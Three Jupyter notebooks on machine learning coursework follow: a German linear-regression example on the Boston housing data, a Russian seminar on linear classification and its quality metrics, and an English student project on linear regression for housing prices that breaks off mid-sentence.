``` import numpy as np np.random.seed(42) import pandas as pd from sklearn.datasets import load_boston from sklearn.model_selection import train_test_split import matplotlib.pyplot as plt dataset = load_boston() df = pd.DataFrame(dataset.data, columns=dataset.feature_names) print(dataset["DESCR"]) ``` #### Einfache Lineare Regression #### Bedeutung - $R^2$: Wie viel Streuung kann von dem Regressionsmodell erklärt werden - coef: Steigung der Geraden - intercept: y-Achsenabschnitt #### Symbole - $\bar{x}$: Mittelwert von $x$ - $\bar{y}$: Mittelwert von $y$ - $\hat{y}$: Prediktion vom Modell #### Datensatz - $m$: Anzahl an Samples - $n$: Anzahl an Features - $x$: Input-Daten (Features) - $y$: Output Daten (Targets) #### Variablen - $x \in \mathbb{R}^{m,n}$ - $y \in \mathbb{R}^{m,}$ - coef, $\bar{x} \in \mathbb{R}^{n}$ - intercept, $\bar{y} \in \mathbb{R}$ #### Formeln - $\beta = (X^TX)^{-1}X^Ty$ - coef = $\beta$\[1:\] - intercept = $\beta$\[0\] - $\hat{y} = X\beta$ - $R^2 = 1 - \frac{\sum_{i=1}^n(y_i-\hat{y})^2}{\sum_{i=1}^n(y_i-\bar{y})^2}$ ``` class LinearRegression: def __init__(self): self.coef_ = None self.intercept_ = None def _add_intercept(self, x): intercepts = np.ones(shape=(x.shape[0])) x = np.column_stack((intercepts, x)) return x def fit(self, x: np.ndarray, y: np.ndarray): x = self._add_intercept(x) inner = np.dot(x.T, x) inv = np.linalg.inv(inner) beta = np.dot(np.dot(inv, x.T), y) self.intercept_ = beta[0] self.coef_ = beta[1:] def predict(self, x: np.ndarray): y_pred = np.array( [np.dot(self.coef_.T, xi) + self.intercept_ for xi in x] ) return y_pred def score(self, x: np.ndarray, y: np.ndarray): y_pred = self.predict(x) y_mean = np.mean(y, axis=0) frac1 = np.sum( [(y[i] - y_pred[i])**2 for i in range(len(y))] ) frac2 = np.sum( [(y[i] - y_mean)**2 for i in range(len(y))] ) r2_score = 1.0 - frac1 / frac2 return r2_score x = dataset.data[:, 5:6] y = dataset.target x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.3) regr = LinearRegression() regr.fit(x_train, y_train) r2_score = regr.score(x_test, y_test) print(f"Coef: {regr.coef_}") print(f"Intercept: {regr.intercept_}") print(f"R2-Score: {r2_score}") ``` #### Visualization ``` def plot_regressor(regr, x_test, y_test): x1 = np.min(x) - 1 x2 = np.max(x) + 1 y_pred = regr.predict([x1, x2]) y1, y2 = y_pred plt.plot((x1, x2), (y1, y2), color="black") plt.scatter(x_test, y_test, color="red") plt.show() plot_regressor(regr, x_test, y_test) def plot_residuals(regr, x_train, y_train, x_test, y_test): y_pred_train = regr.predict(x_train) y_pred_test = regr.predict(x_test) min_val = min(np.min(y_pred_train), np.min(y_pred_test)) max_val = max(np.max(y_pred_train), np.max(y_pred_test)) plt.scatter(y_pred_train, y_pred_train - y_train, color="blue") plt.scatter(y_pred_test, y_pred_test - y_test, color="red") plt.hlines(y=0, xmin=min_val, xmax=max_val) plt.legend(["Train", "Test"]) plt.show() plot_residuals(regr, x_train, y_train, x_test, y_test) ```
github_jupyter
# Семинар 4 # Линейная классификация Задача классификации заключается в том, чтобы отнести каждый из объектов выборки к какому-либо классу из данного набора. Более формально, нам нужно построить классификатор - функцию $a \colon X \rightarrow Y$, которая поставит в соответствие каждому объекту $x$ из пространства объектов $X$ какой-либо класс $y$ из пространства ответов $Y$, где в случае $Y$ - это какое-то конечное множество. То есть, если мы рассмотрим какой-то объект выборки $x$, мы должны получить для него ответ $y = a(x)$. Задачи классификации можно поделить на два типа: бинарная классификация и многоклассовая классификация. В задаче бинарной классификации у нас всего лишь два класса, и множество $Y$ содержит всего два элемента. В задаче же многоклассовой классификации классов больше, чем два. Примеры задач бинарной классификации: - пассажиры с Титаника: выжил ли пассажир? (множество $X$ - пассажиры, множество $Y$ - выжил/нет) - отдаст ли клиент кредит банку? (множество $X$ - клиенты, множество $Y$ - отдаст/нет) - является ли отзыв к товару положительным? (множество $X$ - отзывы, множество $Y$ - положительный/отрицательный) Примеры задач многоклассовой классификации: - какое заболевание у пациента? (множество $X$ - пациенты, множество $Y$ - возможные заболевания) - автоматическое распознавание символов в рукописном тексте (множество $X$ - выделенные в тексте символы, множество $Y$ - словарь символов) - к какому жанру относится данный художественный текст? (множество $X$ - тексты, множество $Y$ - жанры) Для того, чтобы познакомиться с задачей классификации на практике, сгенерируем искусственный датасет, состоящий из 500 объектов. Признаков будет два. Целевая переменная принимает два значения: $-1$ и $1$. ``` import matplotlib.pyplot as plt import numpy as np import pandas as pd %matplotlib inline np.random.seed(13) n = 500 X = np.random.normal(size=(n, 2)) X[:250, :] += 0.75 X[250:, :] -= 1 y = np.array([1] * 250 + [-1] * 250) ``` Визуализируем данные. Построим диаграмму рассеяния по данным признакам, и обозначим объекты разных классов разными цветами. ``` plt.figure(figsize=(11, 6.5)) plt.scatter(X[y == 1, 0], X[y == 1, 1], cmap='winter', s=100, label='objects of class y = 1') plt.scatter(X[y == -1, 0], X[y == -1, 1], cmap='winter', s=100, label='objects of class y = -1') plt.title('Scatterplot of the generated data') plt.xlabel('feature #1') plt.ylabel('feature #2') plt.legend() plt.show() ``` Перед нами стоит задача - разделить объекты на два класса. На картинке видно, что представители этих классов более-менее отделены друг от друга, и почти не перемешиваются. Но как же решить задачу с помощью машинного обучения? Напомним, что задача заключается в построении алгоритма (функции $a(x)$), который позволит классифицировать **любой** объект из пространства возможных объектов. Есть различные типы моделей машинного обучения, которые позволяют решить данную задачу. Одним из типов моделей являются линейные классификаторы. Их особенность заключается в том, что решение о принадлежности объекта к какому-либо классу принимается на основе **линейной комбинации** его характеристик (значений признаков). Предположим, что в датасете $d$ признаков, то есть каждый объект $x$ имеет $d$ характеристик - $x_1, x_2, \ldots, x_d$. Тогда ответ линейного классификатора будет получаться по следующей формуле: $$ y = f\left(\sum\limits_{j = 1}^d w_jx_j\right), \qquad\qquad (1) $$ где $f$ - какая-то функция, подходящая по смыслу нашей задаче (выдающая конечное множество значений - классов), а $w_j$ - веса классификатора. Понятно, что так как мы можем выбрать любую разумную $f$, мы можем "сдвинуть" параметр функции $f$ на некоторое число $w_0$. Тогда можно переписать формулу $(1)$ следующим образом, добавив еще один вес - $w_0$: $$ y = f\left(w_0 + \sum\limits_{j = 1}^d w_jx_j\right) \qquad\qquad (2) $$ Какую же функцию $f$ мы можем выбрать? В задаче бинарной классификации $f$ может быть функцией, которая выдает разные ответы в зависимости от того, какой знак (плюс или минус) имеет рассматриваемое значение: $$ y = \operatorname{sign}\left(w_0 + \sum\limits_{j = 1}^d w_jx_j\right) = \begin{cases} 1, & w_0 + \sum\limits_{j = 1}^d w_jx_j \geq 0 \\ -1, & w_0 + \sum\limits_{j = 1}^d w_jx_j < 0 \end{cases} \qquad\qquad (3) $$ Кстати, если в качестве $f$ выбрать сигмоидную функцию, то получится логистическая регрессия, где на выходе получается вероятность положительного класса: $$ y = \sigma\left(w_0 + \sum\limits_{j = 1}^d w_jx_j\right) = \frac{1}{1 + \exp\left(-w_0 - \sum\limits_{j = 1}^d w_jx_j\right)} $$ Давайте более детально разберем, что мы получили. Приравняем рассматриваемое "сдвинутое" значение линейной комбинации к нулю: $$ w_0 + \sum\limits_{j = 1}^d w_jx_j = 0 \qquad\qquad (4) $$ Это очень похоже на уравнение прямой на плоскости, в котором также есть переменные ($x_1$ и $x_2$), веса ($a$ и $b$) и свободный коэффициент ($c$): $$ ax_1 + bx_2 + c = 0 $$ Формула $(4)$ - это уравнение **гиперплоскости**, что является обобщением прямой на плоскости на пространства любых размерностей. Если говорить строго, прямая является подпространством размерности $1$ пространства размерности $2$ (плоскости), то есть ее размерность на $1$ меньше, чем у исходного пространства. А гиперплоскость - подпространство размерности $d - 1$ пространства размерности $d$. Таким образом, уравнение $(4)$ соответствует гиперплоскости размерности $d - 1$ в пространстве размерности $d$. В таком случае уравнение $(3)$ показывает, **по какую сторону от гиперплоскости лежит объект**. Если объект лежит по одну сторону от гиперплоскости, то он относится к положительному классу, если по другую - к отрицательному. Получается, что данный классификатор строит **разделяющую гиперплоскость**, разделяющую пространство на две области - один класс и другой. Для наглядности разберем случай $d = 2$ на примере сгенерированного ранее датасета. Уравнение разделяющей гиперплоскости (прямой) будет выглядеть так: $$ w_0 + w_1x_1 + w_2x_2 = 0 $$ Зададим веса $w_0 = w_1 = w_2 = 1$ и посмотрим на прямую, которая получится в результате. ``` w0 = 1 w1 = 1 w2 = 1 x1 = np.linspace(X[:, 0].min(), X[:, 0].max(), 1000) x2 = (- w1 * x1 - w0) / w2 plt.figure(figsize=(11, 6.5)) plt.scatter(X[y == 1, 0], X[y == 1, 1], cmap='winter', s=100, label='objects of class y = 1') plt.scatter(X[y == -1, 0], X[y == -1, 1], cmap='winter', s=100, label='objects of class y = -1') plt.plot(x1, x2, color='green', label='separating hyperplane') plt.title('Scatterplot of the generated data') plt.xlabel('feature #1') plt.ylabel('feature #2') plt.legend() plt.show() ``` --- Добавим в данные единичный признак. ``` w_init = np.array([1.0, 1.0, 1.0]) X_new = np.c_[np.ones(n), X] print(X_new) ``` Видно, что прямая неплохо разделяет классы. Однако мы сделали только первое предположение о весах гиперплоскости, и оптимальное качество разбиения можно попробовать получить с помощью градиентного спуска. Для этого, как было сделано в лекции, можно выбрать логистическую функцию потерь: $$ \tilde{Q}(w, X) = \frac{1}{\ell}\sum\limits_{i=1}^\ell\log\left(1 + \exp(-y_i\langle w, x_i\rangle)\right) \rightarrow \min_w $$ Здесь $\ell$ - количество объектов в данных (в нашем случае $\ell = 500$), $w$ - вектор весов, $x_i$ - признаковое описание $i$-ого объекта. Для удобства мы предполагаем, что в данных есть единичный признак (который соответствует весу $w_0$), поэтому левая часть уравнения $(4)$ превращается в скалярное произведение: $$ \langle w, x\rangle = 0 $$ Градиент выбранной функции потерь: $$ \nabla_w\tilde{Q}(w, X) = -\frac{1}{\ell}\sum\limits_{i=1}^\ell\frac{y_ix_i}{1 + \exp(y_i\langle w, x_i\rangle)} $$ Формула градиентного спуска: $$ w^{(t)} = w^{(t - 1)} - \eta\nabla_w\tilde{Q}(w, X) $$ **Задание:** Реализуйте формулы функции потерь и ее градиента ``` (X_new * y.reshape(-1,1))/((1+np.exp((X_new @w_init).reshape(-1,1))*y.reshape(-1,1))) def log_loss(w, X, y): return np.mean(np.log(1+np.exp( -(X @w)*y ))) def log_loss_grad(w, X, y): return -((X * y.reshape(-1,1))/((1+np.exp((X @w))*y)).reshape(-1,1)).mean(axis = 0) ``` Начальное значение функции потерь: ``` log_loss(w_init, X_new, y) ``` Начальное значение градиента функции потерь: ``` log_loss_grad(w_init, X_new, y) ``` Обучим классификатор с помощью градиентного спуска. ``` def gradient_descent(X, y, w_init, n_steps, eta): w = w_init.copy() loss_array = [log_loss(w_init, X, y)] for _ in range(n_steps): w_grad = log_loss_grad(w, X, y) w -= eta * w_grad loss = log_loss(w, X, y) loss_array.append(loss) return w, loss_array w, loss_array = gradient_descent(X_new, y, w_init, n_steps=1000, eta=0.1) print('weights:', w) print('loss value:', loss_array[-1]) ``` Нарисуем график падения значения функции потерь в зависимости от номера шага градиентного спуска. ``` plt.figure(figsize=(11, 6.5)) plt.plot(loss_array) plt.title('Loss change during gradient descent') plt.xlabel('step') plt.ylabel('loss') plt.grid() plt.show() ``` Визуализируем результат. ``` w w0 = w[0] w1 = w[1] w2 = w[2] x1 = np.linspace(X[:, 0].min(), X[:, 0].max(), 1000) x2 = (- w1 * x1 - w0) / w2 plt.figure(figsize=(11, 6.5)) plt.scatter(X[y == 1, 0], X[y == 1, 1], s=100, label='objects of class y = 1') plt.scatter(X[y == -1, 0], X[y == -1, 1], s=100, label='objects of class y = -1') plt.plot(x1, x2, color='green', label='optimal separating hyperplane') plt.title('Scatterplot of the generated data') plt.xlabel('feature #1') plt.ylabel('feature #2') plt.legend() plt.show() ``` В `sklearn` есть готовая реализация линейного классификатора, который можно обучить с помощью градиентного спуска. ``` from sklearn.linear_model import SGDClassifier clf = SGDClassifier(loss='log', learning_rate='constant', eta0=0.1, random_state=13, verbose=1) # заметьте - в данном случае добавлять единичный признак в датасет не нужно, потому что метод SGDClassifier создаст его сам clf.fit(X, y) y_pred_sgdclf = clf.predict(X) ``` Посмотрим на получившиеся веса при признаках и на свободный коэффициент: ``` clf.coef_, clf.intercept_ ``` Визуализируем результат. ``` w0_clf = clf.intercept_.item() w1_clf = clf.coef_[0][0] w2_clf = clf.coef_[0][1] x2_clf = (- w1_clf * x1 - w0_clf) / w2_clf plt.figure(figsize=(11, 6.5)) plt.scatter(X[y == 1, 0], X[y == 1, 1], s=100, label='objects of class y = 1') plt.scatter(X[y == -1, 0], X[y == -1, 1], s=100, label='objects of class y = -1') plt.plot(x1, x2, color='green', label='optimal separating hyperplane (manual)') plt.plot(x1, x2_clf, color='red', label='optimal separating hyperplane (sklearn)') plt.title('Scatterplot of the generated data') plt.xlabel('feature #1') plt.ylabel('feature #2') plt.legend() plt.show() ``` # Метрики качества классификации Итак, мы получили оптимальный результат с точки зрения градиентного спуска. Однако на данный момент мы измеряли качество по значению логистической функции потерь (чем меньше, тем лучше), которое неочень понятно, как интерпретировать. Можно ли рассмотреть что-то более интерпретируемое? **Задание:** напишите функцию `predict_classes`, которая возвращает предсказание класса (`1` or `-1`) для каждого объекта из `X` ``` def predict_classes(X, w): return np.sign(X @ w) y_pred = predict_classes(X_new, w) y_pred[:6], y_pred[-6:] ``` ### Доля правильных ответов (accuracy) Доля правильных ответов - пожалуй, одна из самых тривиальных метрик. Она показывает долю верных предсказаний среди всех объектов: $$ \text{accuracy}(a, X) = \frac{1}{\ell}\sum\limits_{i=1}^\ell [a(x_i) = y_i] $$ ``` from sklearn.metrics import accuracy_score print(accuracy_score(y, y_pred)) print(accuracy_score(y, y_pred_sgdclf)) ``` Итак, алгоритм предсказывает верно 90.4% объектов. Для более детального анализа можно построить матрицу ошибок: | | y = 1 | y = -1 | |-----------|---------------------|---------------------| | a(x) = 1 | True Positive (TP) | False Positive (FP) | | a(x) = -1 | False Negative (FN) | True Negative (TN) | ``` from sklearn.metrics import confusion_matrix confusion_matrix(y, y_pred) ``` Итак, в данном примере алгоритм неправильно классифицирует 21 объект положительного класса и 27 объектов отрицательного класса. Проблема метрики accuracy в том, что она не учитывает цену ошибки, и дает обманчивый результат в случае несбалансированной выборки, о чем рассказывалось в лекции. Следующие метрики позволяют акцентировать большее внимание на разные виды ошибок. ### Точность (precision) Точность показывает долю верно предсказанных положительных объектов среди всех предсказаний положительного класса: $$ \text{precision}(a, X) = \frac{\text{TP}}{\text{TP} + \text{FP}} $$ ``` from sklearn.metrics import precision_score precision_score(y, y_pred) ``` ### Полнота (recall) Полнота показывает долю верно предсказанных положительных объектов среди всех положительных объектов в данных: $$ \text{recall}(a, X) = \frac{\text{TP}}{\text{TP} + \text{FN}} $$ ``` from sklearn.metrics import recall_score recall_score(y, y_pred) ``` Точность и полнота в данном случае показывают похожий результат, потому что модель примерно одинаково ошибается в классификации объектов положительного и отрицательного классов. В реальных задачах можно максимизировать точность или полноту в зависимости от того, какой вид ошибок мы не хотим допускать. Однако обычно при максимизации одной из этих метрик значение другой ухудшается. ### F-мера (F-score) F-мера - это метрика, находящая некоторый баланс между точностью и полнотой. Ее значение - это их гармоническое среднее: $$ \text{F-score}(a, X) = 2\frac{\text{precision}(a, X)\cdot\text{recall}(a, X)}{\text{precision}(a, X) + \text{recall}(a, X)} $$ ``` from sklearn.metrics import f1_score f1_score(y, y_pred) # проверим, что формула выше дает такой же ответ 2 * precision_score(y, y_pred) * recall_score(y, y_pred) / (precision_score(y, y_pred) + recall_score(y, y_pred)) ``` Если какой-либо из метрик (точности или полноте) необходимо отдать приоритет, можно использовать взвешенную версию F-меры - с положительным параметром $\beta$: $$ \text{F-score}_\beta(a, X) = (1 + \beta^2)\frac{\text{precision}(a, X)\cdot\text{recall}(a, X)}{\beta^2\text{precision}(a, X) + \text{recall}(a, X)} $$ Если $0 < \beta < 1$, то нам важнее точность. Это легко проверить, устремив $\beta$ к $0$ - в таком случае в выражении выше останется лишь точность. Если $\beta > 1$, то нам важнее полнота - проверяется это аналогичным образом, устремлением $\beta$ к бесконечности. ``` from sklearn.metrics import fbeta_score beta = 0.5 fbeta_score(y, y_pred, beta=beta) ``` ### PR-кривая и AUC-PRC Вместо того, чтобы предсказывать один из классов в задаче классификации, можно предсказывать вероятность принадлежности одному из классов. А именно, построить алгоритм $b(x)$, который вместо чисел $1$ и $-1$ будет выдавать вещественное число от $0$ до $1$ - вероятность того, что объект принадлежит классу $1$. Скажем, если $b(x) = 0.98$, то можно заключить, что по мнению алгоритма объект $x$ принадлежит классу $1$ с вероятностью $98\%$. Для того, чтобы из предсказаний затем все же получить один из классов $1$ или $-1$, можно задать порог $t$ и использовать алгоритм $a(x) = [b(x) > t]$. Одной из таких моделей является, например, логистическая регрессия. **Задание:** напишите функцию `predict_probabilities`, которая возвращает вероятность принадлежности к классу `1` для каждого объекта из `X` ``` def predict_probabilities(X, w): prob = 1/(1+np.exp(-(X@ w))) return prob y_pred_prob = predict_probabilities(X_new, w) y_pred_prob[:6], y_pred_prob[-6:] ``` На выходе из `predict_probabilities` получается число от $0$ до $1$, и чтобы получить класс в качестве ответа, можно задать порог $t$ равный, к примеру, $0.5$. **Задание:** напишите функцию `threshold`, которая возвращает вероятность предсказание класса (`1` or `-1`) используя вектор вероятностей и порог $t$ ``` def threshold(y_pred_prob, t): y_pred_t = y_pred_prob.copy() y_pred_t[y_pred_t > t] =1 y_pred_t[y_pred_t <= t] =-1 return (y_pred_t) t = 0.5 y_pred_t = threshold(y_pred_prob, t) print('t =', t) print('Precision:', precision_score(y, y_pred_t)) print('Recall:', recall_score(y, y_pred_t)) t = 0.75 y_pred_t = threshold(y_pred_prob, t) print('t =', t) print('Precision:', precision_score(y, y_pred_t)) print('Recall:', recall_score(y, y_pred_t)) t = 0.25 y_pred_t = threshold(y_pred_prob, t) print('t =', t) print('Precision:', precision_score(y, y_pred_t)) print('Recall:', recall_score(y, y_pred_t)) ``` **Как выбрать порог?** Для ответа на этот вопрос, и в целом для более подробного анализа результатов классификации можно использовать PR-кривую, которая показывает взаимосвязь значения порога $t$ и значений точности и полноты. По оси $x$ отложим полноту, по оси $y$ - точность, и для каждого возможного значения порога (которых столько, сколько различных значений вероятностей для объектов в датасете выдал алгоритм) посчитаем значение точности и полноты и обозначим его на графике. ``` from sklearn.metrics import precision_recall_curve precision_array, recall_array, thresholds = precision_recall_curve(y, y_pred_prob) plt.figure(figsize=(11, 6.5)) plt.plot(recall_array, precision_array) plt.title('PR-curve') plt.xlabel('recall') plt.ylabel('precision') plt.show() ``` Предположим, что нам необходимо получить точность не меньше $0.95$. Какой тогда нужно задать порог, чтобы значение полноты было оптимальным? ``` big_precision_idx = np.where(precision_array >= 0.95)[0] big_precision_idx recall_array[big_precision_idx] big_precision_idx[np.argmax(recall_array[big_precision_idx])] t = thresholds[186] y_pred_t = threshold(y_pred_prob, t) print('t =', t) print('Precision:', precision_score(y, y_pred_t)) print('Recall:', recall_score(y, y_pred_t)) f1_score(y, y_pred_t) ``` Площадь под PR-кривой (AUC-PRC) показывает, насколько хорошо классификатор отранжировал объекты. ``` from sklearn.metrics import auc auc(recall_array, precision_array) ``` ### ROC-кривая и AUC-ROC Проанализировать результаты классификации (насколько хорошо алгоритм отранжировал объекты, присвоив им вероятности) также можно с помощью ROC-кривой. Принцип ее построения такой же, как и в PR-кривой - меняя значение порога, считать значения по осям. Только в этом случае по оси $x$ отложен False Positive Rate, по оси $y$ - True Positive Rate (который имеет ту же формулу, что и полнота): $$ \text{FPR} = \frac{\text{FP}}{\text{FP} + \text{TN}} $$ $$ \text{TPR} = \frac{\text{TP}}{\text{TP} + \text{FN}} $$ ``` from sklearn.metrics import roc_curve fpr, tpr, thresholds = roc_curve(y, y_pred_prob) plt.figure(figsize=(11, 6.5)) plt.plot(fpr, tpr) plt.title('ROC-curve') plt.xlabel('False Positive Rate') plt.ylabel('True Positive Rate') plt.show() ``` Площадь под ROC-кривой показывает вероятность того, что случайно выбранная пара объектов, где один из них относится к положительному классу, а другой - к отрицательному, окажется отранжированной правильно с точки зрения вероятностей (алгоритм выдаст бОльшую вероятность в случае объекта положительного класса). ``` from sklearn.metrics import roc_auc_score roc_auc_score(y, y_pred_prob) ``` Как и доля правильных ответов, метрика AUC-ROC может ввести в заблуждение в случае задачи с несбалансированными классами.
github_jupyter
# Project 1: Linear Regression Model This is the first project of our data science fundamentals. This project is designed to solidify your understanding of the concepts we have learned in Regression and to test your knowledge on regression modelling. There are four main objectives of this project. 1\. Build Linear Regression Models * Use closed form solution to estimate parameters * Use packages of choice to estimate parameters<br> 2\. Model Performance Assessment * Provide an analytical rationale with choice of model * Visualize the Model performance * MSE, R-Squared, Train and Test Error <br> 3\. Model Interpretation * Intepret the results of your model * Intepret the model assement <br> 4\. Model Dianostics * Does the model meet the regression assumptions #### About this Notebook 1\. This notebook should guide you through this project and provide started code 2\. The dataset used is the housing dataset from Seattle homes 3\. Feel free to consult online resources when stuck or discuss with data science team members Let's get started. ### Packages Importing the necessary packages for the analysis ``` # Necessary Packages import numpy as np import pandas as pd import matplotlib.pyplot as plt # Model and data preprocessing from sklearn import linear_model from sklearn.model_selection import train_test_split from sklearn.svm import SVR from sklearn.feature_selection import RFE from sklearn import preprocessing %matplotlib inline ``` Now that you have imported your packages, let's read the data that we are going to be using. The dataset provided is a titled *housing_data.csv* and contains housing prices and information about the features of the houses. Below, read the data into a variable and visualize the top 8 rows of the data. ``` # Initiliazing seed np.random.seed(42) data = pd.read_csv('housing_data.csv') data.head(8) ``` ### Split data into train and test In the code below, we need to split the data into the train and test for modeling and validation of our models. We will cover the Train/Validation/Test as we go along in the project. Fill the following code. 1\. Subset the features to the variable: features <br> 2\. Subset the target variable: target <br> 3\. Set the test size in proportion in to a variable: test_size <br> ``` X = pd.DataFrame(np.c_[data['living_area']], columns = ['']) test_size = .33 x_train, x_test, y_train, y_test = train_test_split(features, target, test_size=test_size, random_state=42) ``` ### Data Visualization The best way to explore the data we have is to build some plots that can help us determine the relationship of the data. We can use a scatter matrix to explore all our variables. Below is some starter code to build the scatter matrix ``` features = pd.plotting.scatter_matrix(data, figsize=(14,8), alpha=1, diagonal='kde') ``` Based on the scatter matrix above, write a brief description of what you observe. In thinking about the description, think about the relationship and whether linear regression is an appropriate choice for modelling this data. #### a. lot_area My initial intutions tell me that lot_area would be the best indicator of price; that being said, there is a weak correlation between lot_area and the other features, which is a good sign! However, the distribution is dramatically skewed-right indicating that the mean lot_area is greater than the median. This tells me that lot_area stays around the same size while price increases. In turn, that tells me that some other feature is helping determine the price bceause if lot_area we're determining the increase in price, we'd see a linear distribution. In determining the best feature for my linear regression model, I think lot_area may be one of the least fitting to use. #### b. firstfloor_sqft There is a stronger correlation between firstfloor_sqft and the other features. The distrubution is still skewed-right making the median a better measure of center. firstfloor_sqft would be a good candidate for the linear regression model becuse of the stronger correlation and wider distribution; however, there appears to be a overly strong, linear correlation between firstfloor_sqft and living_area. Given that this linear correlation goes against the Regression Assumption that "all inputs are linearly independent," I would not consider using both in my model. I could, however, use one or the other. #### c. living_area There is a similarly strong correlation between living_area (as compared to firstfloor_sqft) and the other features, but these plots are better distributed than firstfloor_sqft. A right skew still exists, but less so than the firstfloor_sqft. However, the observation of a strong, linear correlation between firstfloor_sqft and living_area (or living_area and firstfloor_sqft) is reinforced here. Thus, I would not use both of these in my final model and having to choose between the two, I will likely choose living_area since it appears to be more well-distributed. #### d. bath Baths are static numbers, so the plots are much less distributed; however, the length and the clustering of the bath to living_area & bath to garage_area may indicate a correlation. Since I cannot use both living_area and firstfloor_sqft, and I think living_area has a better distribution, I would consider using bath in conjunction with living_area. #### e. garage_area Garage_area appears to be well-distributed with the lowest correlation between the other features. This could make it a great fit for the final regression model. It's also the least skewed right distribution. #### Correlation Matrix In the code below, compute the correlation matrix and write a few thoughts about the observations. In doing so, consider the interplay in the features and how their correlation may affect your modeling. The correlation matrix below is in-line with my thought process. Lot_area has the lowest correlation between it and the other features, but it's not well distributed. firstfloor_sqft has a strong correlation between it and living_area. Given that the correlation is just over 0.5, both features may be able to be used in the model given that the correlation isn't overly strong; however, to be most accurate, I plan to leave out one of them (likely firstfloor_sqft). living_area also reflects this strong correlation between it and firstfloor_sqft. Surprisingly, there is a strong correlation between living_area and bath. Looking solely at the scatter matrix, I did not see this strong correlation. This changes my approach slighltly, which I will outline below. garage_area, again, has the lowest correlations while being the most well-distributed. #### Approach Given this new correlation information, I will approach the regression model in one of the following ways: 1. Leave out bath as a feature and use living_area + garage_area. 2. Swap firstfloor_sqft for living_area and include bath + garage area. #### Conclusion I'm not 100% sure if more features are better than less in this situation; however, I am sure that I want linearly independet features. ``` # Use pandas correlation function x_train.corr(method='pearson').style.format("{:.2}").background_gradient(cmap=plt.get_cmap('coolwarm'), axis=1) ``` ## 1. Build Your Model Now that we have explored the data at a high level, let's build our model. From our sessions, we have discussed both closed form solution, gradient descent and using packages. In this section you will create your own estimators. Starter code is provided to makes this easier. #### 1.1. Closed Form Solution Recall: <br> $$\beta_0 = \bar {y} - \beta_1 \bar{x}$$ <br> $$\beta_1 = \frac {cov(x, y)} {var(x)}$$ <br> Below, let's define functions that will compute these parameters ``` # Pass the necessary arguments in the function to calculate the coefficients def compute_estimators(feature, target): n1 = np.sum(feature*target) - np.mean(target)*np.sum(feature) d1 = np.sum(feature*feature) - np.mean(feature)*np.sum(feature) # Compute the Intercept and Slope beta1 = n1/d1 beta0 = np.mean(target) - beta1*np.mean(feature) return beta0, beta1 # Return the Intercept and Slope ``` Run the compute estimators function above and display the estimated coefficients for any of the predictors/input variables. ``` # Remember to pass the correct arguments x_array = np.array(data1['living_area']) normalized_X = preprocessing.normalize([x_array]) beta0, beta1 = compute_estimators(normalized_X, data1['price']) print(beta0, beta1) #### Computing coefficients for our model by hand using the actual mathematical equations #y = beta1x + beta0 #print(y) ``` #### 1.2. sklearn solution Now that we know how to compute the estimators, let's leverage the sklearn module to compute the metrics for us. We have already imported the linear model, let's initialize the model and compute the coefficients for the model with the input above. ``` # Initilize the linear Regression model here model = linear_model.LinearRegression() # Pass in the correct inputs model.fit(data1[['living_area']], data1['price']) # Print the coefficients print("This is beta0:", model.intercept_) print("This is beta1:", model.coef_) #### Computing coefficients for our model using the sklearn package ``` Do the results from the cell above and your implementation match? They should be very close to each other. #### Yes!! They match! ### 2. Model Evaluation Now that we have estimated our single model. We are going to compute the coefficients for all the inputs. We can use a for loop for multiple model estimation. However, we need to create a few functions: 1\. Prediction function: Functions to compute the predictions <br> 2\. MSE: Function to compute Mean Square Error <br> ``` #Function that computes predictions of our model using the betas above + the feature data we've been using def model_predictions(intercept, slope, feature): """ Compute Model Predictions """ y_hat = intercept+(slope*feature) return y_hat y_hat = model_predictions(beta0, beta1, data1['living_area']) #Function to compute MSE which determines the total loss for each predicted data point in our model def mean_square_error(y_outcome, predictions): """ Compute the mean square error """ mse = (np.sum((y_outcome - predictions) ** 2))/np.size(predictions) return mse mse = mean_square_error(target, y_hat) print(mse) ``` The last function we need is a plotting function to visualize our predictions relative to our data. ``` #Function used to plot the data def plotting_model(feature, target, predictions, name): """ Create a scatter and predictions """ fig = plt.figure(figsize=(10,8)) plot_model = model.fit(feature, target) plt.scatter(x=feature, y=target, color='blue') plt.plot(feature, predictions, color='red') plt.xlabel(name) plt.ylabel('Price') return model model = plotting_model(data1[['living_area']], data1['price'], y_hat, data1['living_area'].name) ``` ## Considerations/Reasoning #### Data Integrity After my inital linear model based on the feature "living area," I've eliminated 8 data points. If you look at the graph above, there are 4 outliers that are clear, and at least 4 others that follow a similar trend based on the x, y relationship. I used ~3500 sqft of living area as my cutoff for being not predictive of the model, and any price above 600000. Given the way these data points skew the above model, they intuitively appear to be outliers with high leverage. I determined this by comparing these high leverag points with points similar to it in someway and determined whether it was an outlier (i.e. if point A's price was abnormally high, I found a point (B) with living area at or close to point A's living area and compared the price. vice versa if living area was abnormally high). #### Inital Feature Analysis - "Best" Feature (a priori) Living area is the best metric to use to train the linear model because it incorporates multiple of the other features within it: first floor living space & bath. Living area has a high correlation with both first floor sq ft (0.53) and baths (0.63). Based on the other correlations, these are the two highest, and thus should immediately be eliminated. Additionally, based on initial intuition, one would assume that an increase in the metric "firstfloor sqft" will lead to an increase in the "living area" metric; if both firstfloor sqft and overall living area are increased, the "bath" metric will likely also increase to accommodate the additional living area/sqft in a home. Thus, I will not need to use them in my model because these can be accurately represented by the feature "living area." ### Single Feature Assessment ``` #Running each feature through to determine which has best linear fit features = data[['living_area', 'garage_area', 'lot_area', 'firstfloor_sqft', 'bath']] count = 0 for feature in features: feature = features.iloc[:, count] # Compute the Coefficients beta0, beta1 = compute_estimators(feature, target) count+=1 # Print the Intercept and Slope print(feature.name) print('beta0:', beta0) print('beta1:', beta1) # Compute the Train and Test Predictions y_hat = model_predictions(beta0, beta1, feature) # Plot the Model Scatter name = feature.name model = plotting_model(feature.values.reshape(-1, 1), target, y_hat, name) # Compute the MSE mse = mean_square_error(target, y_hat) print('mean squared error:', mse) print() ``` #### Analysis of Feature Linear Models After eliminating these 8 data points, MSE for Living Area drop significantly from 8957196059.803959 to 2815789647.7664313. In fact, Living Area has the lowest MSE 2815789647.7664313 of all the individual models, and the best linear fit. Garage Area is the next lowest MSE 3466639234.8407283, and the model is mostly linear; however, the bottom left of the model is concerning. You'll notice that a large number of data points go vertically upward indicating an increase in price with 0 garage area. That says to me that garage area isn't predicting the price of these homes, which indicates that it may be a good feature to use in conjunction with another feature (i.e. Living Area) or since those data points do not fit in with the rest of the population, they may need to be removed. #### Run Model Assessment Now that we have our functions ready, we can build individual models, compute preductions, plot our 